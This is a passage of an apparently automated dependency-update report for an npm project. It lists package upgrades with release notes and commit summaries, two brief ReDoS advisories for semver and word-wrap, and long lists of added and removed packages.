โ†—๏ธ prettier-linter-helpers (indirect, 1.0.0 โ†’ 1.0.1) ยท Repo ยท Changelog

Commits

See the full diff on Github. The new version differs by 13 commits:

โ†—๏ธ regexp-tree (indirect, 0.1.23 โ†’ 0.1.27) ยท Repo

Sorry, we couldnโ€™t find anything useful about this release.

โ†—๏ธ resolve (indirect, 1.20.0 โ†’ 2.0.0-next.6) ยท Repo

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

โ†—๏ธ reusify (indirect, 1.0.4 โ†’ 1.1.0) ยท Repo

Release Notes

1.1.0

What's Changed

New Contributors

Full Changelog: v1.0.4...v1.1.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 8 commits:

โ†—๏ธ semver (indirect, 7.3.5 โ†’ 7.7.4) ยท Repo ยท Changelog

Security Advisories ๐Ÿšจ

๐Ÿšจ semver vulnerable to Regular Expression Denial of Service

Versions of the package semver before 7.5.2 on the 7.x branch, before 6.3.1 on the 6.x branch, and all other versions before 5.7.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

โ†—๏ธ side-channel (indirect, 1.0.4 โ†’ 1.1.0) ยท Repo ยท Changelog

Release Notes

1.1.0 (from changelog)

Commits

  • [Refactor] extract implementations to side-channel-weakmap, side-channel-map, side-channel-list ada5955
  • [New] add channel.delete c01d2d3
  • [types] improve types 0c54356
  • [readme] add content be24868
  • [actions] split out node 10-20, and 20+ c4488e2
  • [types] use shared tsconfig 0e0d57c
  • [Dev Deps] update @ljharb/eslint-config, @ljharb/tsconfig, @types/get-intrinsic, @types/object-inspect, @types/tape, auto-changelog, tape fb4f622
  • [Deps] update call-bind, get-intrinsic, object-inspect b78336b
  • [Tests] replace aud with npm audit ee3ab46
  • [Dev Deps] add missing peer dep c03e21a

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 33 commits:

โ†—๏ธ signal-exit (indirect, 3.0.3 โ†’ 4.1.0) ยท Repo ยท Changelog

Commits

See the full diff on Github. The new version differs by 34 commits:

โ†—๏ธ slash (indirect, 4.0.0 โ†’ 5.1.0) ยท Repo

Release Notes

5.1.0

v5.0.1...v5.1.0

5.0.1

v5.0.0...v5.0.1

5.0.0

Breaking

Improvements

v4.0.0...v5.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 8 commits:

โ†—๏ธ string-width (indirect, 4.2.2 โ†’ 8.2.0) ยท Repo

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 36 commits:

โ†—๏ธ string.prototype.trimend (indirect, 1.0.4 โ†’ 1.0.9) ยท Repo ยท Changelog

Release Notes

1.0.9 (from changelog)

Commits

  • [actions] split out node 10-20, and 20+ 7e5ffdc
  • [meta] sort package.json mildly 2f99c8b
  • [Dev Deps] update @es-shims/api, @ljharb/eslint-config, auto-changelog, tape 2774fe6
  • [Refactor] use call-bound directly 9e3bbec
  • [Tests] replace aud with npm audit cb9a462
  • [meta] add missing engines.node f46c829
  • [Deps] update call-bind e892c32
  • [Dev Deps] add missing peer dep e1a59da

1.0.7 (from changelog)

Commits

  • [Dev Deps] update @es-shims/api, @ljharb/eslint-config, aud, tape 1a10293
  • [Deps] update define-properties, es-abstract 6ba2e19

1.0.6 (from changelog)

Commits

  • [meta] use npmignore to autogenerate an npmignore file 1d1e717
  • [actions] update rebase action to use reusable workflow 83f2683
  • [Dev Deps] update aud, tape a3a9129
  • [Deps] update es-abstract a6e476d

1.0.5 (from changelog)

Commits

  • [actions] reuse common workflows 69a56ce
  • [actions] use node/install instead of node/run; use codecov action 5d7db31
  • [Fix] ensure main entry point properly checks the receiver in ES3 engines bb1983d
  • [Fix] as of unicode v6, the mongolian vowel separator is no longer whitespace 10a1091
  • [Dev Deps] update eslint, @ljharb/eslint-config, @es-shims/api, safe-publish-latest, tape a08e14b
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, auto-changelog, functions-have-names, tape 1c4c8da
  • [actions] update codecov uploader 70c4a7c
  • [Dev Deps] update eslint, @ljharb/eslint-config, @es-shims/api, aud, auto-changelog, tape 4b08ed7
  • [readme] add github actions/codecov badges 9805501
  • [Dev Deps] update eslint, tape 50ec335
  • [actions] update workflows bf9c32e
  • [meta] use prepublishOnly script for npm 7+ 9d921bd
  • [Deps] update define-properties 15617ce

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 34 commits:

โ†—๏ธ string.prototype.trimstart (indirect, 1.0.4 โ†’ 1.0.8) ยท Repo ยท Changelog

Release Notes

1.0.7 (from changelog)

Commits

  • [Dev Deps] update @es-shims/api, @ljharb/eslint-config, aud, tape 58e7aa6
  • [Deps] update define-properties, es-abstract 8d9a7bf

1.0.6 (from changelog)

Commits

  • [meta] use npmignore to autogenerate an npmignore file 0838ae4
  • [actions] update rebase action to use reusable workflow d6bb784
  • [Dev Deps] update aud, tape 8734d9a
  • [Deps] update es-abstract 30f593f

1.0.5 (from changelog)

Commits

  • [actions] reuse common workflows 61d4009
  • [actions] use node/install instead of node/run; use codecov action bfe39c4
  • [Fix] ensure main entry point properly checks the receiver in ES3 engines 36e3730
  • [Fix] as of unicode v6, the mongolian vowel separator is no longer whitespace 4f77eed
  • [Dev Deps] update eslint, @ljharb/eslint-config, @es-shims/api, safe-publish-latest, tape 59fcb99
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, auto-changelog, functions-have-names, tape 486ffcf
  • [actions] update codecov uploader b33ac48
  • [Dev Deps] update eslint, @ljharb/eslint-config, @es-shims/api, aud, auto-changelog, tape 3c89fa5
  • [readme] add github actions/codecov badges 00be6b3
  • [Dev Deps] update eslint, tape 13a08f5
  • [actions] update workflows 6ac576d
  • [meta] use prepublishOnly script for npm 7+ fa382ca
  • [Deps] update define-properties d57bffe

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 28 commits:

โ†—๏ธ strip-ansi (indirect, 6.0.0 โ†’ 7.2.0) ยท Repo

Release Notes

7.2.0

  • Improve performance by adding fast path for strings without ANSI codes (#54) d67a5b3

v7.1.2...v7.2.0

7.1.2

v7.1.0...v7.1.2

7.1.0

v7.0.1...v7.1.0

7.0.1

v7.0.0...v7.0.1

7.0.0

Breaking

v6.0.0...v7.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 17 commits:

โ†—๏ธ strip-final-newline (indirect, 2.0.0 โ†’ 4.0.0) ยท Repo

Release Notes

4.0.0

Breaking

  • Require Node.js 18 (#7) 077250c
  • When specifying a Uint8Array, the returned value is no longer copied. Learn more

Improvements

v3.0.0...v4.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 13 commits:

โ†—๏ธ strip-indent (indirect, 4.0.0 โ†’ 4.1.1) ยท Repo

Release Notes

4.1.1

v4.1.0...v4.1.1

4.1.0

v4.0.0...v4.1.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 7 commits:

โ†—๏ธ supports-hyperlinks (indirect, 2.2.0 โ†’ 4.4.0) ยท Repo

Release Notes

3.1.0

  • Add support for Windows Terminal (#8) e161d1d

v3.0.0...v3.1.0

3.0.0

Breaking

  • Require Node.js 14

Improvements

v2.3.0...v3.0.0

2.3.0

v2.2.0...v2.3.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 27 commits:

โ†—๏ธ tapable (indirect, 0.1.10 โ†’ 2.3.0) ยท Repo

Release Notes

2.3.0

Features

  • [TYPES] Added TypedHookMap type.

2.2.3

Fixes

  • Async hook catch an error when reject a falsy value
  • [typescript] Support to pass return type for waterfall hooks

2.2.2

Developer Experience

  • add interceptors type to hook class

2.2.1

Developer Experience

  • fix some incorrect typings

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

โ†—๏ธ tslib (indirect, 1.14.1 โ†’ 2.8.1) ยท Repo

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

โ†—๏ธ type-fest (indirect, 0.20.2 โ†’ 5.4.4) ยท Repo

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 8 commits:

โ†—๏ธ typescript (indirect, 4.3.5 โ†’ 5.9.3) ยท Repo

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

โ†—๏ธ unbox-primitive (indirect, 1.0.1 โ†’ 1.1.0) ยท Repo ยท Changelog

Release Notes

1.1.0 (from changelog)

Commits

  • [meta] use npmignore to autogenerate an npmignore file 348a5ad
  • [New] add types a324230
  • [Tests] use es-value-fixtures a321ae5
  • [actions] split out node 10-20, and 20+ 04a0e0d
  • [Dev Deps] update @ljharb/eslint-config, auto-changelog, npmignore, object-inspect, object-is, tape 7fff971
  • [actions] update rebase action 91d6807
  • [Deps] update call-bind, has-symbols, which-boxed-primitive f8b6597
  • [Dev Deps] update aud, object-inspect, tape b3362a1
  • [Refactor] use call-bound directly e29ff5f
  • [meta] add missing engines.node d3420bc
  • [Tests] replace aud with npm audit 5e6a6d0
  • [Deps] update which-boxed-primitive 0ff873d
  • [Dev Deps] update aud dd0e373
  • [Dev Deps] add missing peer dep 4f79b24

1.0.2 (from changelog)

Commits

  • [actions] reuse common workflows e6420b9
  • [actions] update codecov uploader b90aff2
  • [readme] add github actions/codecov badges; update URLs bcc39b9
  • [Dev Deps] update eslint, @ljharb/eslint-config, object-inspect, safe-publish-latest, tape a704a32
  • [Refactor] use call-bind instead of function-bind 0a609f1
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, auto-changelog, object-inspect, safe-publish-latest, tape 6a45317
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, auto-changelog, object-inspect, tape 795c76f
  • [Deps] update has-bigints, has-symbols 257a065

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 24 commits:

โ†—๏ธ which-boxed-primitive (indirect, 1.0.2 โ†’ 1.1.1) ยท Repo ยท Changelog

Release Notes

1.1.1 (from changelog)

Commits

  • [Deps] update is-boolean-object, is-number-object, is-string, is-symbol 5266e0c
  • [Dev Deps] update @arethetypeswrong/cli, @ljharb/tsconfig, @types/tape a660339

1.1.0 (from changelog)

Commits

  • [actions] reuse common workflows 893df44
  • [meta] use npmignore to autogenerate an npmignore file bab1ff8
  • [Tests] use es-value-fixtures and for-each ecacfa0
  • [New] add types ab38e78
  • [actions] split out node 10-20, and 20+ 7ee9c3c
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, auto-changelog, object-inspect, safe-publish-latest, tape 142215a
  • [Dev Deps] update eslint, @ljharb/eslint-config, aud, auto-changelog, has-symbols, object-inspect, tape 3559371
  • [actions] update rebase action to use reusable workflow 928901a
  • [Deps] update is-bigint, is-boolean-object, is-number-object, is-string, is-symbol f7b14be
  • [Dev Deps] update @ljharb/eslint-config, auto-changelog, npmignore, object-inspect, tape 5296738
  • [Deps] update is-bigint, is-boolean-object, is-number-object, is-string, is-symbol caa6d1c
  • [meta] add missing engines.node ca40880
  • [Tests] replace aud with npm audit b0f4069
  • [Dev Deps] update aud 8d0e336
  • [Deps] update is-number-object eafcabf
  • [Dev Deps] add missing peer dep ec4dd52

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 20 commits:

โ†—๏ธ word-wrap (indirect, 1.2.3 โ†’ 1.2.5) ยท Repo

Security Advisories ๐Ÿšจ

๐Ÿšจ word-wrap vulnerable to Regular Expression Denial of Service

All versions of the package word-wrap are vulnerable to Regular Expression Denial of Service (ReDoS) due to the usage of an insecure regular expression within the result variable.

Release Notes

1.2.5

Changes:

Reverts default value for options.indent to two spaces ' '.

Full Changelog: 1.2.4...1.2.5

1.2.4

What's Changed

New Contributors

Full Changelog: 1.2.3...1.2.4

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 16 commits:

โ‰๏ธ yallist (downgrade, 4.0.0 โ†’ 3.1.1) ยท Repo

Commits

See the full diff on Github. The new version differs by 48 commits:

๐Ÿ†• @โ€‹babel/helper-globals (added, 7.28.0)

๐Ÿ†• @โ€‹babel/helper-string-parser (added, 7.27.1)

๐Ÿ†• @โ€‹emnapi/core (added, 1.9.0)

๐Ÿ†• @โ€‹emnapi/runtime (added, 1.9.0)

๐Ÿ†• @โ€‹emnapi/wasi-threads (added, 1.2.0)

๐Ÿ†• @โ€‹eslint-community/eslint-plugin-eslint-comments (added, 4.7.1)

๐Ÿ†• @โ€‹eslint-community/eslint-utils (added, 4.9.1)

๐Ÿ†• @โ€‹eslint-community/regexpp (added, 4.12.2)

๐Ÿ†• @โ€‹eslint/compat (added, 2.0.3)

๐Ÿ†• @โ€‹eslint/config-array (added, 0.21.2)

๐Ÿ†• @โ€‹eslint/config-helpers (added, 0.4.2)

๐Ÿ†• @โ€‹eslint/core (added, 1.1.1)

๐Ÿ†• @โ€‹eslint/css (added, 0.14.1)

๐Ÿ†• @โ€‹eslint/css-tree (added, 3.6.9)

๐Ÿ†• @โ€‹eslint/js (added, 9.39.4)

๐Ÿ†• @โ€‹eslint/json (added, 1.1.0)

๐Ÿ†• @โ€‹eslint/object-schema (added, 2.1.7)

๐Ÿ†• @โ€‹eslint/plugin-kit (added, 0.4.1)

๐Ÿ†• @โ€‹humanfs/core (added, 0.19.1)

๐Ÿ†• @โ€‹humanfs/node (added, 0.16.7)

๐Ÿ†• @โ€‹humanwhocodes/module-importer (added, 1.0.1)

๐Ÿ†• @โ€‹humanwhocodes/momoa (added, 3.3.10)

๐Ÿ†• @โ€‹humanwhocodes/retry (added, 0.4.3)

๐Ÿ†• @โ€‹jridgewell/gen-mapping (added, 0.3.13)

๐Ÿ†• @โ€‹jridgewell/remapping (added, 2.3.5)

๐Ÿ†• @โ€‹jridgewell/resolve-uri (added, 3.1.2)

๐Ÿ†• @โ€‹jridgewell/sourcemap-codec (added, 1.5.5)

๐Ÿ†• @โ€‹jridgewell/trace-mapping (added, 0.3.31)

๐Ÿ†• @โ€‹napi-rs/wasm-runtime (added, 0.2.12)

๐Ÿ†• @โ€‹package-json/types (added, 0.0.12)

๐Ÿ†• @โ€‹pkgr/core (added, 0.2.9)

๐Ÿ†• @โ€‹sec-ant/readable-stream (added, 0.4.1)

๐Ÿ†• @โ€‹sindresorhus/merge-streams (added, 4.0.0)

๐Ÿ†• @โ€‹sindresorhus/tsconfig (added, 8.1.0)

๐Ÿ†• @โ€‹stylistic/eslint-plugin (added, 5.10.0)

๐Ÿ†• @โ€‹tybys/wasm-util (added, 0.10.1)

๐Ÿ†• @โ€‹types/esrecurse (added, 4.3.1)

๐Ÿ†• @โ€‹typescript-eslint/project-service (added, 8.57.0)

๐Ÿ†• @โ€‹typescript-eslint/tsconfig-utils (added, 8.57.0)

๐Ÿ†• @โ€‹typescript-eslint/type-utils (added, 8.57.0)

๐Ÿ†• @โ€‹typescript-eslint/utils (added, 8.57.0)

๐Ÿ†• @โ€‹unrs/resolver-binding-android-arm-eabi (added, 1.11.1)

๐Ÿ†• @โ€‹unrs/resolver-binding-android-arm64 (added, 1.11.1)

๐Ÿ†• @โ€‹unrs/resolver-binding-darwin-arm64 (added, 1.11.1)

๐Ÿ†• @โ€‹unrs/resolver-binding-darwin-x64 (added, 1.11.1)

๐Ÿ†• @โ€‹unrs/resolver-binding-freebsd-x64 (added, 1.11.1)

๐Ÿ†• @โ€‹unrs/resolver-binding-linux-arm-gnueabihf (added, 1.11.1)

๐Ÿ†• @โ€‹unrs/resolver-binding-linux-arm-musleabihf (added, 1.11.1)

๐Ÿ†• @โ€‹unrs/resolver-binding-linux-arm64-gnu (added, 1.11.1)

๐Ÿ†• @โ€‹unrs/resolver-binding-linux-arm64-musl (added, 1.11.1)

๐Ÿ†• @โ€‹unrs/resolver-binding-linux-ppc64-gnu (added, 1.11.1)

๐Ÿ†• @โ€‹unrs/resolver-binding-linux-riscv64-gnu (added, 1.11.1)

๐Ÿ†• @โ€‹unrs/resolver-binding-linux-riscv64-musl (added, 1.11.1)

๐Ÿ†• @โ€‹unrs/resolver-binding-linux-s390x-gnu (added, 1.11.1)

๐Ÿ†• @โ€‹unrs/resolver-binding-linux-x64-gnu (added, 1.11.1)

๐Ÿ†• @โ€‹unrs/resolver-binding-linux-x64-musl (added, 1.11.1)

๐Ÿ†• @โ€‹unrs/resolver-binding-wasm32-wasi (added, 1.11.1)

๐Ÿ†• @โ€‹unrs/resolver-binding-win32-arm64-msvc (added, 1.11.1)

๐Ÿ†• @โ€‹unrs/resolver-binding-win32-ia32-msvc (added, 1.11.1)

๐Ÿ†• @โ€‹unrs/resolver-binding-win32-x64-msvc (added, 1.11.1)

๐Ÿ†• array-buffer-byte-length (added, 1.0.2)

๐Ÿ†• array.prototype.findlast (added, 1.2.5)

๐Ÿ†• array.prototype.flatmap (added, 1.3.3)

๐Ÿ†• array.prototype.tosorted (added, 1.1.4)

๐Ÿ†• arraybuffer.prototype.slice (added, 1.0.4)

๐Ÿ†• async-function (added, 1.0.0)

๐Ÿ†• available-typed-arrays (added, 1.0.7)

๐Ÿ†• baseline-browser-mapping (added, 2.10.8)

๐Ÿ†• bundle-name (added, 4.1.0)

๐Ÿ†• call-bind-apply-helpers (added, 1.0.2)

๐Ÿ†• call-bound (added, 1.0.4)

๐Ÿ†• change-case (added, 5.4.4)

๐Ÿ†• comment-parser (added, 1.4.5)

๐Ÿ†• common-path-prefix (added, 3.0.0)

๐Ÿ†• core-js-compat (added, 3.48.0)

๐Ÿ†• data-view-buffer (added, 1.0.2)

๐Ÿ†• data-view-byte-length (added, 1.0.2)

๐Ÿ†• data-view-byte-offset (added, 1.0.1)

๐Ÿ†• default-browser (added, 5.5.0)

๐Ÿ†• default-browser-id (added, 5.0.1)

๐Ÿ†• define-data-property (added, 1.1.4)

๐Ÿ†• dunder-proto (added, 1.0.1)

๐Ÿ†• env-paths (added, 2.2.1)

๐Ÿ†• environment (added, 1.1.0)

๐Ÿ†• es-define-property (added, 1.0.1)

๐Ÿ†• es-errors (added, 1.3.0)

๐Ÿ†• es-iterator-helpers (added, 1.3.1)

๐Ÿ†• es-object-atoms (added, 1.1.1)

๐Ÿ†• es-set-tostringtag (added, 2.1.0)

๐Ÿ†• es-shim-unscopables (added, 1.1.0)

๐Ÿ†• eslint-compat-utils (added, 0.5.1)

๐Ÿ†• eslint-config-xo-react (added, 0.29.0)

๐Ÿ†• eslint-import-context (added, 0.1.9)

๐Ÿ†• eslint-plugin-es-x (added, 7.8.0)

๐Ÿ†• eslint-plugin-import-x (added, 4.16.2)

๐Ÿ†• eslint-plugin-n (added, 17.24.0)

๐Ÿ†• eslint-plugin-react (added, 7.37.5)

๐Ÿ†• eslint-plugin-react-hooks (added, 7.0.1)

๐Ÿ†• figures (added, 6.1.0)

๐Ÿ†• find-cache-directory (added, 6.0.0)

๐Ÿ†• find-up-simple (added, 1.0.1)

๐Ÿ†• for-each (added, 0.3.5)

๐Ÿ†• function.prototype.name (added, 1.1.8)

๐Ÿ†• functions-have-names (added, 1.2.3)

๐Ÿ†• generator-function (added, 2.0.1)

๐Ÿ†• get-east-asian-width (added, 1.5.0)

๐Ÿ†• get-proto (added, 1.0.1)

๐Ÿ†• get-symbol-description (added, 1.1.0)

๐Ÿ†• get-tsconfig (added, 4.13.6)

๐Ÿ†• globalthis (added, 1.0.4)

๐Ÿ†• globrex (added, 0.1.2)

๐Ÿ†• gopd (added, 1.2.0)

๐Ÿ†• has-property-descriptors (added, 1.0.2)

๐Ÿ†• has-proto (added, 1.2.0)

๐Ÿ†• hasown (added, 2.0.2)

๐Ÿ†• hermes-estree (added, 0.25.1)

๐Ÿ†• hermes-parser (added, 0.25.1)

๐Ÿ†• is-array-buffer (added, 3.0.5)

๐Ÿ†• is-async-function (added, 2.1.1)

๐Ÿ†• is-data-view (added, 1.0.2)

๐Ÿ†• is-finalizationregistry (added, 1.1.1)

๐Ÿ†• is-generator-function (added, 1.1.2)

๐Ÿ†• is-in-ssh (added, 1.0.0)

๐Ÿ†• is-inside-container (added, 1.0.0)

๐Ÿ†• is-map (added, 2.0.3)

๐Ÿ†• is-set (added, 2.0.3)

๐Ÿ†• is-shared-array-buffer (added, 1.0.4)

๐Ÿ†• is-typed-array (added, 1.1.15)

๐Ÿ†• is-weakmap (added, 2.0.2)

๐Ÿ†• is-weakref (added, 1.1.1)

๐Ÿ†• is-weakset (added, 2.0.4)

๐Ÿ†• isarray (added, 2.0.5)

๐Ÿ†• iterator.prototype (added, 1.1.5)

๐Ÿ†• json-buffer (added, 3.0.1)

๐Ÿ†• jsx-ast-utils (added, 3.3.5)

๐Ÿ†• keyv (added, 4.5.4)

๐Ÿ†• loose-envify (added, 1.4.0)

๐Ÿ†• math-intrinsics (added, 1.1.0)

๐Ÿ†• mdn-data (added, 2.23.0)

๐Ÿ†• napi-postinstall (added, 0.3.4)

๐Ÿ†• node-exports-info (added, 1.6.0)

๐Ÿ†• object-assign (added, 4.1.1)

๐Ÿ†• object.entries (added, 1.1.9)

๐Ÿ†• object.fromentries (added, 2.0.8)

๐Ÿ†• own-keys (added, 1.0.1)

๐Ÿ†• parse-ms (added, 4.0.0)

๐Ÿ†• picocolors (added, 1.1.1)

๐Ÿ†• possible-typed-array-names (added, 1.1.0)

๐Ÿ†• powershell-utils (added, 0.1.0)

๐Ÿ†• pretty-ms (added, 9.3.0)

๐Ÿ†• prop-types (added, 15.8.1)

๐Ÿ†• react-is (added, 16.13.1)

๐Ÿ†• reflect.getprototypeof (added, 1.0.10)

๐Ÿ†• regexp.prototype.flags (added, 1.5.4)

๐Ÿ†• regjsparser (added, 0.13.0)

๐Ÿ†• resolve-pkg-maps (added, 1.0.0)

๐Ÿ†• run-applescript (added, 7.1.0)

๐Ÿ†• safe-array-concat (added, 1.1.3)

๐Ÿ†• safe-push-apply (added, 1.0.0)

๐Ÿ†• safe-regex-test (added, 1.1.0)

๐Ÿ†• set-function-length (added, 1.2.2)

๐Ÿ†• set-function-name (added, 2.0.2)

๐Ÿ†• set-proto (added, 1.0.0)

๐Ÿ†• side-channel-list (added, 1.0.0)

๐Ÿ†• side-channel-map (added, 1.0.1)

๐Ÿ†• side-channel-weakmap (added, 1.0.2)

๐Ÿ†• source-map-js (added, 1.2.1)

๐Ÿ†• stable-hash-x (added, 0.2.0)

๐Ÿ†• stop-iteration-iterator (added, 1.1.0)

๐Ÿ†• string.prototype.matchall (added, 4.0.12)

๐Ÿ†• string.prototype.repeat (added, 1.0.0)

๐Ÿ†• string.prototype.trim (added, 1.2.10)

๐Ÿ†• supports-preserve-symlinks-flag (added, 1.0.0)

๐Ÿ†• synckit (added, 0.11.12)

๐Ÿ†• tagged-tag (added, 1.0.0)

๐Ÿ†• tinyglobby (added, 0.2.15)

๐Ÿ†• ts-api-utils (added, 2.4.0)

๐Ÿ†• ts-declaration-location (added, 1.0.7)

๐Ÿ†• typed-array-buffer (added, 1.0.3)

๐Ÿ†• typed-array-byte-length (added, 1.0.3)

๐Ÿ†• typed-array-byte-offset (added, 1.0.4)

๐Ÿ†• typed-array-length (added, 1.0.7)

๐Ÿ†• typescript-eslint (added, 8.57.0)

๐Ÿ†• unicorn-magic (added, 0.4.0)

๐Ÿ†• unrs-resolver (added, 1.11.1)

๐Ÿ†• update-browserslist-db (added, 1.2.3)

๐Ÿ†• which-builtin-type (added, 1.2.1)

๐Ÿ†• which-collection (added, 1.0.2)

๐Ÿ†• which-typed-array (added, 1.1.20)

๐Ÿ†• wsl-utils (added, 0.3.1)

๐Ÿ†• yoctocolors (added, 2.1.2)

๐Ÿ†• zod (added, 4.3.6)

๐Ÿ†• zod-validation-error (added, 4.0.2)

๐Ÿ—‘๏ธ @โ€‹babel/eslint-parser (removed)

๐Ÿ—‘๏ธ @โ€‹babel/helper-function-name (removed)

๐Ÿ—‘๏ธ @โ€‹babel/helper-get-function-arity (removed)

๐Ÿ—‘๏ธ @โ€‹babel/helper-hoist-variables (removed)

๐Ÿ—‘๏ธ @โ€‹babel/helper-member-expression-to-functions (removed)

๐Ÿ—‘๏ธ @โ€‹babel/helper-optimise-call-expression (removed)

๐Ÿ—‘๏ธ @โ€‹babel/helper-replace-supers (removed)

๐Ÿ—‘๏ธ @โ€‹babel/helper-simple-access (removed)

๐Ÿ—‘๏ธ @โ€‹babel/helper-split-export-declaration (removed)

๐Ÿ—‘๏ธ @โ€‹babel/highlight (removed)

๐Ÿ—‘๏ธ @โ€‹humanwhocodes/config-array (removed)

๐Ÿ—‘๏ธ @โ€‹humanwhocodes/object-schema (removed)

๐Ÿ—‘๏ธ @โ€‹types/eslint-scope (removed)

๐Ÿ—‘๏ธ @โ€‹types/minimist (removed)

๐Ÿ—‘๏ธ @โ€‹types/node (removed)

๐Ÿ—‘๏ธ @โ€‹types/normalize-package-data (removed)

๐Ÿ—‘๏ธ @โ€‹types/parse-json (removed)

๐Ÿ—‘๏ธ @โ€‹typescript-eslint/experimental-utils (removed)

๐Ÿ—‘๏ธ @โ€‹webassemblyjs/ast (removed)

๐Ÿ—‘๏ธ @โ€‹webassemblyjs/floating-point-hex-parser (removed)

๐Ÿ—‘๏ธ @โ€‹webassemblyjs/helper-api-error (removed)

๐Ÿ—‘๏ธ @โ€‹webassemblyjs/helper-buffer (removed)

๐Ÿ—‘๏ธ @โ€‹webassemblyjs/helper-numbers (removed)

๐Ÿ—‘๏ธ @โ€‹webassemblyjs/helper-wasm-bytecode (removed)

๐Ÿ—‘๏ธ @โ€‹webassemblyjs/helper-wasm-section (removed)

๐Ÿ—‘๏ธ @โ€‹webassemblyjs/ieee754 (removed)

๐Ÿ—‘๏ธ @โ€‹webassemblyjs/leb128 (removed)

๐Ÿ—‘๏ธ @โ€‹webassemblyjs/utf8 (removed)

๐Ÿ—‘๏ธ @โ€‹webassemblyjs/wasm-edit (removed)

๐Ÿ—‘๏ธ @โ€‹webassemblyjs/wasm-gen (removed)

๐Ÿ—‘๏ธ @โ€‹webassemblyjs/wasm-opt (removed)

๐Ÿ—‘๏ธ @โ€‹webassemblyjs/wasm-parser (removed)

๐Ÿ—‘๏ธ @โ€‹webassemblyjs/wast-printer (removed)

๐Ÿ—‘๏ธ @โ€‹xtuc/ieee754 (removed)

๐Ÿ—‘๏ธ @โ€‹xtuc/long (removed)

๐Ÿ—‘๏ธ ajv-keywords (removed)

๐Ÿ—‘๏ธ ansi-colors (removed)

๐Ÿ—‘๏ธ array-find (removed)

๐Ÿ—‘๏ธ array-union (removed)

๐Ÿ—‘๏ธ astral-regex (removed)

๐Ÿ—‘๏ธ axios (removed)

๐Ÿ—‘๏ธ buf-compare (removed)

๐Ÿ—‘๏ธ buffer-from (removed)

๐Ÿ—‘๏ธ camelcase (removed)

๐Ÿ—‘๏ธ camelcase-keys (removed)

๐Ÿ—‘๏ธ chrome-trace-event (removed)

๐Ÿ—‘๏ธ colorette (removed)

๐Ÿ—‘๏ธ commander (removed)

๐Ÿ—‘๏ธ commondir (removed)

๐Ÿ—‘๏ธ core-assert (removed)

๐Ÿ—‘๏ธ decamelize (removed)

๐Ÿ—‘๏ธ decamelize-keys (removed)

๐Ÿ—‘๏ธ deep-strict-equal (removed)

๐Ÿ—‘๏ธ dir-glob (removed)

๐Ÿ—‘๏ธ emoji-regex (removed)

๐Ÿ—‘๏ธ enquirer (removed)

๐Ÿ—‘๏ธ es-module-lexer (removed)

๐Ÿ—‘๏ธ eslint-config-xo (removed)

๐Ÿ—‘๏ธ eslint-config-xo-typescript (removed)

๐Ÿ—‘๏ธ eslint-import-resolver-node (removed)

๐Ÿ—‘๏ธ eslint-import-resolver-webpack (removed)

๐Ÿ—‘๏ธ eslint-module-utils (removed)

๐Ÿ—‘๏ธ eslint-plugin-ava (removed)

๐Ÿ—‘๏ธ eslint-plugin-es (removed)

๐Ÿ—‘๏ธ eslint-plugin-eslint-comments (removed)

๐Ÿ—‘๏ธ eslint-plugin-import (removed)

๐Ÿ—‘๏ธ eslint-plugin-no-use-extend-native (removed)

๐Ÿ—‘๏ธ eslint-plugin-node (removed)

๐Ÿ—‘๏ธ eslint-plugin-promise (removed)

๐Ÿ—‘๏ธ eslint-template-visitor (removed)

๐Ÿ—‘๏ธ eslint-utils (removed)

๐Ÿ—‘๏ธ esm-utils (removed)

๐Ÿ—‘๏ธ esprima (removed)

๐Ÿ—‘๏ธ events (removed)

๐Ÿ—‘๏ธ find-cache-dir (removed)

๐Ÿ—‘๏ธ find-root (removed)

๐Ÿ—‘๏ธ follow-redirects (removed)

๐Ÿ—‘๏ธ fs-extra (removed)

๐Ÿ—‘๏ธ fs.realpath (removed)

๐Ÿ—‘๏ธ functional-red-black-tree (removed)

๐Ÿ—‘๏ธ get-set-props (removed)

๐Ÿ—‘๏ธ glob (removed)

๐Ÿ—‘๏ธ hard-rejection (removed)

๐Ÿ—‘๏ธ has (removed)

๐Ÿ—‘๏ธ hosted-git-info (removed)

๐Ÿ—‘๏ธ import-modules (removed)

๐Ÿ—‘๏ธ inflight (removed)

๐Ÿ—‘๏ธ inherits (removed)

๐Ÿ—‘๏ธ interpret (removed)

๐Ÿ—‘๏ธ is-absolute (removed)

๐Ÿ—‘๏ธ is-error (removed)

๐Ÿ—‘๏ธ is-fullwidth-code-point (removed)

๐Ÿ—‘๏ธ is-get-set-prop (removed)

๐Ÿ—‘๏ธ is-js-type (removed)

๐Ÿ—‘๏ธ is-negated-glob (removed)

๐Ÿ—‘๏ธ is-obj-prop (removed)

๐Ÿ—‘๏ธ is-proto-prop (removed)

๐Ÿ—‘๏ธ is-relative (removed)

๐Ÿ—‘๏ธ is-unc-path (removed)

